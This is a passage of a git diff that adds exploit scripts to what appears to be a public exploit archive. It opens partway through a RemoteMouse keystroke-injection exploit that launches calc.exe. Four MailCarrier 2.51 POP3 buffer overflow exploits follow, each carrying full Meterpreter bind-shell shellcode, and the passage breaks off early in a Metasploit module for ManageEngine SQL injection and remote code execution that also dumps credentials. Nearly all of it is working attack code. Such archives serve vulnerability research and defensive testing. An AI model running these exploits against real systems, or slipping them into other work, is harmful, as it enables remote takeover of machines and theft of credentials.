+    "A":"key  8[ras]116", "B":"key  8[ras]119", "C":"key  8[ras]118", "D":"key  8[ras]113", "E":"key  8[ras]112", 
+    "F":"key  8[ras]115", "G":"key  8[ras]114", "H":"key  8[ras]125", "I":"key  8[ras]124", "J":"key  8[ras]127", 
+    "K":"key  8[ras]126", "L":"key  8[ras]121", "M":"key  8[ras]120", "N":"key  8[ras]123", "O":"key  8[ras]122", 
+    "P":"key  8[ras]101", "Q":"key  8[ras]100", "R":"key  8[ras]103", "S":"key  8[ras]102", "T":"key  7[ras]97", 
+    "U":"key  7[ras]96", "V":"key  7[ras]99", "W":"key  7[ras]98", "X":"key  8[ras]109", "Y":"key  8[ras]108", 
+    "Z":"key  8[ras]111",
+
+    "a":"key  7[ras]84", "b":"key  7[ras]87", "c":"key  7[ras]86", "d":"key  7[ras]81", "e":"key  7[ras]80", 
+    "f":"key  7[ras]83", "g":"key  7[ras]82", "h":"key  7[ras]93", "i":"key  7[ras]92", "j":"key  7[ras]95", 
+    "k":"key  7[ras]94", "l":"key  7[ras]89", "m":"key  7[ras]88", "n":"key  7[ras]91", "o":"key  7[ras]90", 
+    "p":"key  7[ras]69", "q":"key  7[ras]68", "r":"key  7[ras]71", "s":"key  7[ras]70", "t":"key  7[ras]65", 
+    "u":"key  7[ras]64", "v":"key  7[ras]67", "w":"key  7[ras]66", "x":"key  7[ras]77", "y":"key  7[ras]76", 
+    "z":"key  7[ras]79",
+
+    "1":"key  6[ras]4", "2":"key  6[ras]7", "3":"key  6[ras]6", "4":"key  6[ras]1", "5":"key  6[ras]0",
+    "6":"key  6[ras]3", "7":"key  6[ras]2", "8":"key  7[ras]13", "9":"key  7[ras]12", "0":"key  6[ras]5",
+
+    "\n":"key  3RTN", "\b":"key  3BAS", " ":"key  7[ras]21",
+
+    "+":"key  7[ras]30", "=":"key  6[ras]8", "/":"key  7[ras]26", "_":"key  8[ras]106", "<":"key  6[ras]9", 
+    ">":"key  7[ras]11", "[":"key  8[ras]110", "]":"key  8[ras]104", "!":"key  7[ras]20", "@":"key  8[ras]117", 
+    "#":"key  7[ras]22", "$":"key  7[ras]17", "%":"key  7[ras]16", "^":"key  8[ras]107", "&":"key  7[ras]19", 
+    "*":"key  7[ras]31", "(":"key  7[ras]29", ")":"key  7[ras]28", "-":"key  7[ras]24", "'":"key  7[ras]18", 
+    '"':"key  7[ras]23", ":":"key  7[ras]15", ";":"key  7[ras]14", "?":"key  7[ras]10", "`":"key  7[ras]85", 
+    "~":"key  7[ras]75", "\\":"key  8[ras]105", "|":"key  7[ras]73", "{":"key  7[ras]78", "}":"key  7[ras]72",
+    ",":"key  7[ras]25", ".":"key  7[ras]27"
+}
+
+
+def PopCalc(ip):
+    MoveMouse(-5000,3000,ip)
+    MousePress(mouse.leftClick,ip)
+    sleep(1)
+    SendString("calc.exe",ip)
+    sleep(1)
+    SendString("\n",ip)
+    print("SUCCESS! Process calc.exe has run on target",ip)
+
+
+def main():
+    try:
+        targetIP=argv[1]
+    except:
+        print("ERROR: You forgot to enter an IP! example: exploit.py 10.0.0.1")
+        exit()
+    if Ping(targetIP)==True:
+        PopCalc(targetIP)
+    else:
+        print("ERROR: Target machine is not running RemoteMouse")
+        exit()
+
+if __name__=="__main__":
+    main()
\ No newline at end of file
diff --git a/exploits/windows/remote/46699.py b/exploits/windows/remote/46699.py
new file mode 100755
index 000000000..3a5981651
--- /dev/null
+++ b/exploits/windows/remote/46699.py
@@ -0,0 +1,60 @@
+#!/usr/bin/python
+# Exploit Title: MailCarrier 2.51 - Remote Buffer Overflow in "USER" command(POP3)
+# Date: 14/04/2019
+# Exploit Author: Dino Covotsos - Telspace Systems
+# Vendor Homepage: https://www.tabslab.com/
+# Version: 2.51
+# Software Link: N.A
+# Contact: services[@]telspace.co.za
+# Twitter: @telspacesystems (Greets to the Telspace Crew)
+# Tested on: Windows XP Prof SP3 ENG x86
+# CVE: TBC from Mitre
+# Created for the Telspace Internship 2019 - Vanilla EIP Overwrite
+# POC
+# 1.) Change ip and port in code
+# 2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine
+# 0x1b023059 : push esp # ret 0x10 | ascii {PAGE_EXECUTE_READ} [msjet40.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.00.9514.0 (C:\WINDOWS\system32\msjet40.dll)
+# Badchars \x00\xd9
+
+import sys
+import socket
+import time
+
+#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -b "\x00\xd9" -f c
+shellcode = ("\x29\xc9\x83\xe9\xb2\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
+"\x44\x9b\x1b\x0b\x83\xee\xfc\xe2\xf4\xb8\x73\x99\x0b\x44\x9b"
+"\x7b\x82\xa1\xaa\xdb\x6f\xcf\xcb\x2b\x80\x16\x97\x90\x59\x50"
+"\x10\x69\x23\x4b\x2c\x51\x2d\x75\x64\xb7\x37\x25\xe7\x19\x27"
+"\x64\x5a\xd4\x06\x45\x5c\xf9\xf9\x16\xcc\x90\x59\x54\x10\x51"
+"\x37\xcf\xd7\x0a\x73\xa7\xd3\x1a\xda\x15\x10\x42\x2b\x45\x48"
+"\x90\x42\x5c\x78\x21\x42\xcf\xaf\x90\x0a\x92\xaa\xe4\xa7\x85"
+"\x54\x16\x0a\x83\xa3\xfb\x7e\xb2\x98\x66\xf3\x7f\xe6\x3f\x7e"
+"\xa0\xc3\x90\x53\x60\x9a\xc8\x6d\xcf\x97\x50\x80\x1c\x87\x1a"
+"\xd8\xcf\x9f\x90\x0a\x94\x12\x5f\x2f\x60\xc0\x40\x6a\x1d\xc1"
+"\x4a\xf4\xa4\xc4\x44\x51\xcf\x89\xf0\x86\x19\xf3\x28\x39\x44"
+"\x9b\x73\x7c\x37\xa9\x44\x5f\x2c\xd7\x6c\x2d\x43\x64\xce\xb3"
+"\xd4\x9a\x1b\x0b\x6d\x5f\x4f\x5b\x2c\xb2\x9b\x60\x44\x64\xce"
+"\x61\x4f\xc2\x4b\xe9\xb9\xf1\x1a\x61\x46\xf3\xf1\x04\x9b\x7b"
+"\xe4\xde\xd3\xf3\x19\x0b\x45\x20\x92\xed\x2e\x8b\x4d\x5c\x2c"
+"\x59\xc0\x3c\x23\x64\xce\x8e\x84\xee\x43\x5c\x2c\x2c\xf2\x33"
+"\xbb\x64\xce\x5c\x2c\xef\xf7\x30\xa5\x64\xce\x5c\xd3\xf3\x6e"
+"\x65\x09\xfa\xe4\xde\x2e\x9b\x71\x0f\x12\xcc\x73\x09\x9d\x53"
+"\x44\xf4\x91\x18\xe3\x0b\x3a\xb6\x90\x3d\x2e\xdb\x73\x0b\x54"
+"\x9b\x1b\x5d\x2e\x9b\x73\x53\xe0\xc8\xfe\xf4\x91\x08\x48\x61"
+"\x44\xcd\x48\x5c\x2c\x99\xc2\xc3\x1b\x64\xce\x88\xbc\x9b\x65"
+"\x0c\x45\x58\x32\xcd\x31\x72\xd8\xb0\xb4\x2e\xb9\x5d\x2e\x9b"
+"\x48\xf4\x91\x9b\x1b\x0b")
+
+buffer = "A" * 5094 + "\x59\x30\x02\x1b" + "\x90" * 20 + shellcode + "C" * (882-len(shellcode))
+
+print "[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command\r\n"
+print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer)
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+connect=s.connect(("192.168.0.150", 110))
+print s.recv(1024)
+s.send('USER ' + buffer + '\r\n')
+print s.recv(1024)
+s.send('QUIT\r\n')
+s.close()
+time.sleep(1)
+print "[*] Done, but if you get here the exploit failed!"
\ No newline at end of file
diff --git a/exploits/windows/remote/46700.py b/exploits/windows/remote/46700.py
new file mode 100755
index 000000000..67933c963
--- /dev/null
+++ b/exploits/windows/remote/46700.py
@@ -0,0 +1,89 @@
+#!/usr/bin/python
+# Exploit Title: MailCarrier 2.51 - SEH Remote Buffer Overflow in "LIST" command(POP3)
+# Date: 14/04/2019
+# Exploit Author: Dino Covotsos - Telspace Systems
+# Vendor Homepage: https://www.tabslab.com/
+# Version: 2.51
+# Software Link: N.A
+# Contact: services[@]telspace.co.za
+# Twitter: @telspacesystems (Greets to the Telspace Crew)
+# Tested on: Windows XP Prof SP3 ENG x86
+# CVE: TBC from Mitre
+# Created for the Telspace Internship 2019 - SEH Exploit
+# POC
+# 1.) Change ip, username, password and port in code
+# 2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine
+#0x1b0d110c : pop ecx # pop ecx # ret 0x08 | ascii {PAGE_EXECUTE_READ} [msjet40.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.00.9514.0 (C:\WINDOWS\system32\msjet40.dll)
+#nseh 6178 seh 6182
+import sys
+import socket
+import time
+
+#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b "\x00\xd5\x0a\x0d\x1a\x03" -f c
+shellcode = ("\x89\xe1\xdb\xcb\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
+"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
+"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+"\x69\x6c\x78\x68\x6f\x72\x47\x70\x37\x70\x53\x30\x31\x70\x4f"
+"\x79\x58\x65\x66\x51\x49\x50\x50\x64\x4c\x4b\x50\x50\x56\x50"
+"\x4e\x6b\x56\x32\x74\x4c\x6e\x6b\x50\x52\x36\x74\x6c\x4b\x63"
+"\x42\x36\x48\x66\x6f\x58\x37\x52\x6a\x35\x76\x76\x51\x69\x6f"
+"\x6c\x6c\x35\x6c\x51\x71\x33\x4c\x75\x52\x64\x6c\x47\x50\x69"
+"\x51\x4a\x6f\x34\x4d\x37\x71\x38\x47\x58\x62\x6c\x32\x62\x72"
+"\x70\x57\x6c\x4b\x52\x72\x42\x30\x4e\x6b\x53\x7a\x65\x6c\x6e"
+"\x6b\x30\x4c\x42\x31\x33\x48\x78\x63\x31\x58\x55\x51\x4b\x61"
+"\x66\x31\x6c\x4b\x50\x59\x37\x50\x67\x71\x38\x53\x6e\x6b\x33"
+"\x79\x65\x48\x6a\x43\x75\x6a\x62\x69\x6c\x4b\x56\x54\x6e\x6b"
+"\x37\x71\x38\x56\x55\x61\x39\x6f\x4c\x6c\x4a\x61\x78\x4f\x46"
+"\x6d\x37\x71\x49\x57\x66\x58\x69\x70\x31\x65\x6b\x46\x55\x53"
+"\x51\x6d\x69\x68\x65\x6b\x61\x6d\x51\x34\x74\x35\x6a\x44\x70"
+"\x58\x6c\x4b\x30\x58\x55\x74\x65\x51\x6b\x63\x61\x76\x6e\x6b"
+"\x76\x6c\x30\x4b\x6e\x6b\x71\x48\x47\x6c\x33\x31\x7a\x73\x4c"
+"\x4b\x55\x54\x6c\x4b\x77\x71\x6e\x30\x4b\x39\x32\x64\x34\x64"
+"\x36\x44\x61\x4b\x51\x4b\x45\x31\x30\x59\x52\x7a\x42\x71\x59"
+"\x6f\x69\x70\x53\x6f\x33\x6f\x72\x7a\x4c\x4b\x34\x52\x78\x6b"
+"\x6c\x4d\x63\x6d\x71\x78\x50\x33\x77\x42\x55\x50\x53\x30\x33"
+"\x58\x70\x77\x70\x73\x30\x32\x31\x4f\x61\x44\x42\x48\x30\x4c"
+"\x54\x37\x76\x46\x34\x47\x59\x6f\x78\x55\x78\x38\x4c\x50\x33"
+"\x31\x65\x50\x35\x50\x35\x79\x48\x44\x50\x54\x30\x50\x75\x38"
+"\x56\x49\x6f\x70\x62\x4b\x75\x50\x69\x6f\x68\x55\x73\x5a\x74"
+"\x4b\x42\x79\x62\x70\x79\x72\x59\x6d\x53\x5a\x63\x31\x52\x4a"
+"\x67\x72\x65\x38\x6b\x5a\x74\x4f\x79\x4f\x69\x70\x69\x6f\x48"
+"\x55\x5a\x37\x31\x78\x44\x42\x73\x30\x33\x31\x4d\x6b\x6e\x69"
+"\x38\x66\x70\x6a\x76\x70\x70\x56\x72\x77\x53\x58\x6f\x32\x59"
+"\x4b\x46\x57\x73\x57\x39\x6f\x38\x55\x6d\x55\x39\x50\x43\x45"
+"\x61\x48\x53\x67\x65\x38\x4e\x57\x59\x79\x66\x58\x4b\x4f\x6b"
+"\x4f\x59\x45\x43\x67\x75\x38\x51\x64\x58\x6c\x77\x4b\x39\x71"
+"\x69\x6f\x49\x45\x32\x77\x4d\x47\x42\x48\x43\x45\x32\x4e\x52"
+"\x6d\x50\x61\x4b\x4f\x39\x45\x52\x4a\x67\x70\x53\x5a\x74\x44"
+"\x73\x66\x42\x77\x53\x58\x43\x32\x7a\x79\x39\x58\x63\x6f\x79"
+"\x6f\x6e\x35\x4d\x53\x4c\x38\x65\x50\x73\x4e\x46\x4d\x4e\x6b"
+"\x66\x56\x30\x6a\x57\x30\x65\x38\x33\x30\x62\x30\x77\x70\x75"
+"\x50\x63\x66\x70\x6a\x65\x50\x52\x48\x61\x48\x39\x34\x61\x43"
+"\x69\x75\x69\x6f\x38\x55\x7a\x33\x50\x53\x31\x7a\x45\x50\x66"
+"\x36\x51\x43\x76\x37\x31\x78\x43\x32\x69\x49\x6f\x38\x51\x4f"
+"\x4b\x4f\x39\x45\x4d\x53\x69\x68\x43\x30\x63\x4e\x73\x37\x67"
+"\x71\x4a\x63\x44\x69\x5a\x66\x73\x45\x38\x69\x6a\x63\x6f\x4b"
+"\x4a\x50\x4c\x75\x4e\x42\x42\x76\x33\x5a\x37\x70\x63\x63\x69"
+"\x6f\x78\x55\x41\x41")
+
+buffer = "A" * 6174 + "\xeb\x11\x90\x90" + "\x0c\x11\x0d\x1b" + "\x90" * 20 + shellcode + "D" * (3798-(len(shellcode)))
+
+print "[*] MailCarrier 2.51 POP3 Buffer Overflow in LIST command\r\n"
+print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer)
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+connect=s.connect(("192.168.0.150", 110))
+print s.recv(1024)
+print "[*] Sending USERNAME\r\n"
+s.send('USER test' + '\r\n')
+print s.recv(1024)
+print "[*] Sending PASSWORD\r\n"
+s.send('PASS test' + '\r\n')
+print s.recv(1024)
+print "[*] Sending Evil LIST buffer\r\n"
+s.send('LIST ' + buffer + '\r\n')
+print s.recv(1024)
+s.send('QUIT\r\n')
+s.close()
+time.sleep(1)
+print "[*] Done, but if you get here the exploit failed!"
\ No newline at end of file
diff --git a/exploits/windows/remote/46701.py b/exploits/windows/remote/46701.py
new file mode 100755
index 000000000..e4a5b0b75
--- /dev/null
+++ b/exploits/windows/remote/46701.py
@@ -0,0 +1,88 @@
+#!/usr/bin/python
+# Exploit Title: MailCarrier 2.51 - SEH Remote Buffer Overflow in "TOP" command(POP3)
+# Date: 14/04/2019
+# Exploit Author: Dino Covotsos - Telspace Systems
+# Vendor Homepage: https://www.tabslab.com/
+# Version: 2.51
+# Software Link: N.A
+# Contact: services[@]telspace.co.za
+# Twitter: @telspacesystems (Greets to the Telspace Crew)
+# Tested on: Windows XP Prof SP3 ENG x86
+# CVE: TBC from Mitre
+# Created for the Telspace Internship 2019 - SEH Exploit
+# POC
+# 1.) Change ip, username, password and port in code
+# 2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine
+#0x1b0d110c : pop ecx # pop ecx # ret 0x08 | ascii {PAGE_EXECUTE_READ} [msjet40.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.00.9514.0 (C:\WINDOWS\system32\msjet40.dll)
+#crash at 6175
+import sys
+import socket
+import time
+
+#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b "\x00\xd5\x0a\x0d\x1a\x03" -f c
+shellcode = ("\x89\xe1\xdb\xcb\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
+"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
+"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+"\x69\x6c\x78\x68\x6f\x72\x47\x70\x37\x70\x53\x30\x31\x70\x4f"
+"\x79\x58\x65\x66\x51\x49\x50\x50\x64\x4c\x4b\x50\x50\x56\x50"
+"\x4e\x6b\x56\x32\x74\x4c\x6e\x6b\x50\x52\x36\x74\x6c\x4b\x63"
+"\x42\x36\x48\x66\x6f\x58\x37\x52\x6a\x35\x76\x76\x51\x69\x6f"
+"\x6c\x6c\x35\x6c\x51\x71\x33\x4c\x75\x52\x64\x6c\x47\x50\x69"
+"\x51\x4a\x6f\x34\x4d\x37\x71\x38\x47\x58\x62\x6c\x32\x62\x72"
+"\x70\x57\x6c\x4b\x52\x72\x42\x30\x4e\x6b\x53\x7a\x65\x6c\x6e"
+"\x6b\x30\x4c\x42\x31\x33\x48\x78\x63\x31\x58\x55\x51\x4b\x61"
+"\x66\x31\x6c\x4b\x50\x59\x37\x50\x67\x71\x38\x53\x6e\x6b\x33"
+"\x79\x65\x48\x6a\x43\x75\x6a\x62\x69\x6c\x4b\x56\x54\x6e\x6b"
+"\x37\x71\x38\x56\x55\x61\x39\x6f\x4c\x6c\x4a\x61\x78\x4f\x46"
+"\x6d\x37\x71\x49\x57\x66\x58\x69\x70\x31\x65\x6b\x46\x55\x53"
+"\x51\x6d\x69\x68\x65\x6b\x61\x6d\x51\x34\x74\x35\x6a\x44\x70"
+"\x58\x6c\x4b\x30\x58\x55\x74\x65\x51\x6b\x63\x61\x76\x6e\x6b"
+"\x76\x6c\x30\x4b\x6e\x6b\x71\x48\x47\x6c\x33\x31\x7a\x73\x4c"
+"\x4b\x55\x54\x6c\x4b\x77\x71\x6e\x30\x4b\x39\x32\x64\x34\x64"
+"\x36\x44\x61\x4b\x51\x4b\x45\x31\x30\x59\x52\x7a\x42\x71\x59"
+"\x6f\x69\x70\x53\x6f\x33\x6f\x72\x7a\x4c\x4b\x34\x52\x78\x6b"
+"\x6c\x4d\x63\x6d\x71\x78\x50\x33\x77\x42\x55\x50\x53\x30\x33"
+"\x58\x70\x77\x70\x73\x30\x32\x31\x4f\x61\x44\x42\x48\x30\x4c"
+"\x54\x37\x76\x46\x34\x47\x59\x6f\x78\x55\x78\x38\x4c\x50\x33"
+"\x31\x65\x50\x35\x50\x35\x79\x48\x44\x50\x54\x30\x50\x75\x38"
+"\x56\x49\x6f\x70\x62\x4b\x75\x50\x69\x6f\x68\x55\x73\x5a\x74"
+"\x4b\x42\x79\x62\x70\x79\x72\x59\x6d\x53\x5a\x63\x31\x52\x4a"
+"\x67\x72\x65\x38\x6b\x5a\x74\x4f\x79\x4f\x69\x70\x69\x6f\x48"
+"\x55\x5a\x37\x31\x78\x44\x42\x73\x30\x33\x31\x4d\x6b\x6e\x69"
+"\x38\x66\x70\x6a\x76\x70\x70\x56\x72\x77\x53\x58\x6f\x32\x59"
+"\x4b\x46\x57\x73\x57\x39\x6f\x38\x55\x6d\x55\x39\x50\x43\x45"
+"\x61\x48\x53\x67\x65\x38\x4e\x57\x59\x79\x66\x58\x4b\x4f\x6b"
+"\x4f\x59\x45\x43\x67\x75\x38\x51\x64\x58\x6c\x77\x4b\x39\x71"
+"\x69\x6f\x49\x45\x32\x77\x4d\x47\x42\x48\x43\x45\x32\x4e\x52"
+"\x6d\x50\x61\x4b\x4f\x39\x45\x52\x4a\x67\x70\x53\x5a\x74\x44"
+"\x73\x66\x42\x77\x53\x58\x43\x32\x7a\x79\x39\x58\x63\x6f\x79"
+"\x6f\x6e\x35\x4d\x53\x4c\x38\x65\x50\x73\x4e\x46\x4d\x4e\x6b"
+"\x66\x56\x30\x6a\x57\x30\x65\x38\x33\x30\x62\x30\x77\x70\x75"
+"\x50\x63\x66\x70\x6a\x65\x50\x52\x48\x61\x48\x39\x34\x61\x43"
+"\x69\x75\x69\x6f\x38\x55\x7a\x33\x50\x53\x31\x7a\x45\x50\x66"
+"\x36\x51\x43\x76\x37\x31\x78\x43\x32\x69\x49\x6f\x38\x51\x4f"
+"\x4b\x4f\x39\x45\x4d\x53\x69\x68\x43\x30\x63\x4e\x73\x37\x67"
+"\x71\x4a\x63\x44\x69\x5a\x66\x73\x45\x38\x69\x6a\x63\x6f\x4b"
+"\x4a\x50\x4c\x75\x4e\x42\x42\x76\x33\x5a\x37\x70\x63\x63\x69"
+"\x6f\x78\x55\x41\x41")
+
+buffer = "A" * 6175 + "\xeb\x11\x90\x90" + "\x0c\x11\x0d\x1b" + "\x90" * 20 + shellcode + "D" * (10000-6883)
+
+print "[*] Mail Server 2.51 POP3 Buffer Overflow in TOP command\r\n"
+print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer)
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+connect=s.connect(("192.168.0.150", 110))
+print s.recv(1024)
+print "[*] Sending USERNAME\r\n"
+s.send('USER test' + '\r\n')
+print s.recv(1024)
+print "[*] Sending PASSWORD\r\n"
+s.send('PASS test' + '\r\n')
+print s.recv(1024)
+print "[*] Sending TOP command plus evil buffer\r\n"
+s.send('TOP ' + buffer + '\r\n')
+s.send('QUIT\r\n')
+s.close()
+time.sleep(1)
+print "[*] Done, check for meterpreter shell on port 443 of the target!"
\ No newline at end of file
diff --git a/exploits/windows/remote/46719.py b/exploits/windows/remote/46719.py
new file mode 100755
index 000000000..e763eedb3
--- /dev/null
+++ b/exploits/windows/remote/46719.py
@@ -0,0 +1,88 @@
+#!/usr/bin/python
+# Exploit Title: MailCarrier 2.51 - SEH Remote Buffer Overflow in "RETR" command(POP3)
+# Date: 16/04/2019
+# Exploit Author: Dino Covotsos - Telspace Systems
+# Vendor Homepage: https://www.tabslab.com/
+# Version: 2.51
+# Software Link: N.A
+# Contact: services[@]telspace.co.za
+# Twitter: @telspacesystems (Greets to the Telspace Crew)
+# Tested on: Windows XP Prof SP3 ENG x86
+# CVE: TBC from Mitre
+# Created for the Telspace Internship 2019 - SEH Exploit
+# POC
+# 1.) Change ip, username, password and port in code
+# 2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine
+#0x1b0d110c : pop ecx # pop ecx # ret 0x08 | ascii {PAGE_EXECUTE_READ} [msjet40.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.00.9514.0 (C:\WINDOWS\system32\msjet40.dll)
+#N.B For all Mail Carrier exploits, increase/decrease the initial EIP overwrite buffer if your target ip is larger/smaller in digits.
+#Crash at 6174
+import sys
+import socket
+import time
+
+#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b "\x00\xd5\x0a\x0d\x1a\x03" -f c
+shellcode = ("\x89\xe1\xdb\xcb\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
+"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
+"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+"\x69\x6c\x78\x68\x6f\x72\x47\x70\x37\x70\x53\x30\x31\x70\x4f"
+"\x79\x58\x65\x66\x51\x49\x50\x50\x64\x4c\x4b\x50\x50\x56\x50"
+"\x4e\x6b\x56\x32\x74\x4c\x6e\x6b\x50\x52\x36\x74\x6c\x4b\x63"
+"\x42\x36\x48\x66\x6f\x58\x37\x52\x6a\x35\x76\x76\x51\x69\x6f"
+"\x6c\x6c\x35\x6c\x51\x71\x33\x4c\x75\x52\x64\x6c\x47\x50\x69"
+"\x51\x4a\x6f\x34\x4d\x37\x71\x38\x47\x58\x62\x6c\x32\x62\x72"
+"\x70\x57\x6c\x4b\x52\x72\x42\x30\x4e\x6b\x53\x7a\x65\x6c\x6e"
+"\x6b\x30\x4c\x42\x31\x33\x48\x78\x63\x31\x58\x55\x51\x4b\x61"
+"\x66\x31\x6c\x4b\x50\x59\x37\x50\x67\x71\x38\x53\x6e\x6b\x33"
+"\x79\x65\x48\x6a\x43\x75\x6a\x62\x69\x6c\x4b\x56\x54\x6e\x6b"
+"\x37\x71\x38\x56\x55\x61\x39\x6f\x4c\x6c\x4a\x61\x78\x4f\x46"
+"\x6d\x37\x71\x49\x57\x66\x58\x69\x70\x31\x65\x6b\x46\x55\x53"
+"\x51\x6d\x69\x68\x65\x6b\x61\x6d\x51\x34\x74\x35\x6a\x44\x70"
+"\x58\x6c\x4b\x30\x58\x55\x74\x65\x51\x6b\x63\x61\x76\x6e\x6b"
+"\x76\x6c\x30\x4b\x6e\x6b\x71\x48\x47\x6c\x33\x31\x7a\x73\x4c"
+"\x4b\x55\x54\x6c\x4b\x77\x71\x6e\x30\x4b\x39\x32\x64\x34\x64"
+"\x36\x44\x61\x4b\x51\x4b\x45\x31\x30\x59\x52\x7a\x42\x71\x59"
+"\x6f\x69\x70\x53\x6f\x33\x6f\x72\x7a\x4c\x4b\x34\x52\x78\x6b"
+"\x6c\x4d\x63\x6d\x71\x78\x50\x33\x77\x42\x55\x50\x53\x30\x33"
+"\x58\x70\x77\x70\x73\x30\x32\x31\x4f\x61\x44\x42\x48\x30\x4c"
+"\x54\x37\x76\x46\x34\x47\x59\x6f\x78\x55\x78\x38\x4c\x50\x33"
+"\x31\x65\x50\x35\x50\x35\x79\x48\x44\x50\x54\x30\x50\x75\x38"
+"\x56\x49\x6f\x70\x62\x4b\x75\x50\x69\x6f\x68\x55\x73\x5a\x74"
+"\x4b\x42\x79\x62\x70\x79\x72\x59\x6d\x53\x5a\x63\x31\x52\x4a"
+"\x67\x72\x65\x38\x6b\x5a\x74\x4f\x79\x4f\x69\x70\x69\x6f\x48"
+"\x55\x5a\x37\x31\x78\x44\x42\x73\x30\x33\x31\x4d\x6b\x6e\x69"
+"\x38\x66\x70\x6a\x76\x70\x70\x56\x72\x77\x53\x58\x6f\x32\x59"
+"\x4b\x46\x57\x73\x57\x39\x6f\x38\x55\x6d\x55\x39\x50\x43\x45"
+"\x61\x48\x53\x67\x65\x38\x4e\x57\x59\x79\x66\x58\x4b\x4f\x6b"
+"\x4f\x59\x45\x43\x67\x75\x38\x51\x64\x58\x6c\x77\x4b\x39\x71"
+"\x69\x6f\x49\x45\x32\x77\x4d\x47\x42\x48\x43\x45\x32\x4e\x52"
+"\x6d\x50\x61\x4b\x4f\x39\x45\x52\x4a\x67\x70\x53\x5a\x74\x44"
+"\x73\x66\x42\x77\x53\x58\x43\x32\x7a\x79\x39\x58\x63\x6f\x79"
+"\x6f\x6e\x35\x4d\x53\x4c\x38\x65\x50\x73\x4e\x46\x4d\x4e\x6b"
+"\x66\x56\x30\x6a\x57\x30\x65\x38\x33\x30\x62\x30\x77\x70\x75"
+"\x50\x63\x66\x70\x6a\x65\x50\x52\x48\x61\x48\x39\x34\x61\x43"
+"\x69\x75\x69\x6f\x38\x55\x7a\x33\x50\x53\x31\x7a\x45\x50\x66"
+"\x36\x51\x43\x76\x37\x31\x78\x43\x32\x69\x49\x6f\x38\x51\x4f"
+"\x4b\x4f\x39\x45\x4d\x53\x69\x68\x43\x30\x63\x4e\x73\x37\x67"
+"\x71\x4a\x63\x44\x69\x5a\x66\x73\x45\x38\x69\x6a\x63\x6f\x4b"
+"\x4a\x50\x4c\x75\x4e\x42\x42\x76\x33\x5a\x37\x70\x63\x63\x69"
+"\x6f\x78\x55\x41\x41")
+
+buffer = "A" * 6174 + "\xeb\x11\x90\x90" + "\x0c\x11\x0d\x1b" + "\x90" * 20 + shellcode + "D" * (10000-6882)
+
+print "[*] Mail Server 2.51 POP3 Buffer Overflow in RETR command\r\n"
+print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer)
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+connect=s.connect(("192.168.0.150", 110))
+print s.recv(1024)
+print "[*] Sending USERNAME\r\n"
+s.send('USER test' + '\r\n')
+print s.recv(1024)
+print "[*] Sending PASSWORD\r\n"
+s.send('PASS test' + '\r\n')
+print s.recv(1024)
+s.send('RETR ' + buffer + '\r\n')
+s.send('QUIT\r\n')
+s.close()
+time.sleep(1)
+print "[*] Done, check for meterpreter shell on target ip port 443!"
\ No newline at end of file
diff --git a/exploits/windows/remote/46725.rb b/exploits/windows/remote/46725.rb
new file mode 100755
index 000000000..8bb2d9acf
--- /dev/null
+++ b/exploits/windows/remote/46725.rb
@@ -0,0 +1,213 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => "ManageEngine Applications Manager 11.0 < 14.0 SQL Injection / Remote Code Execution",
+      'Description'    => %q(
+        This module exploits sql and command injection vulnerability in the ManageEngine AM 14 and prior versions.
+        An unauthenticated user can gain the authority of "system" on the server due to SQL injection vulnerability.
+        Exploit allows the writing of the desired file to the system using the postgesql structure.
+        Module is written over the payload by selecting a file with the extension ".vbs" that is used for monitoring 
+        by the ManageEngine which working with "system" authority.
+
+        In addition, it dumps the users and passwords from the database for us.
+        Keep in mind! After the harmful ".vbs" file is written, the shell session may be a bit late.
+        Because the ManageEngine application should run this file itself.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module @ehakkus
+        ],
+      'References'     =>
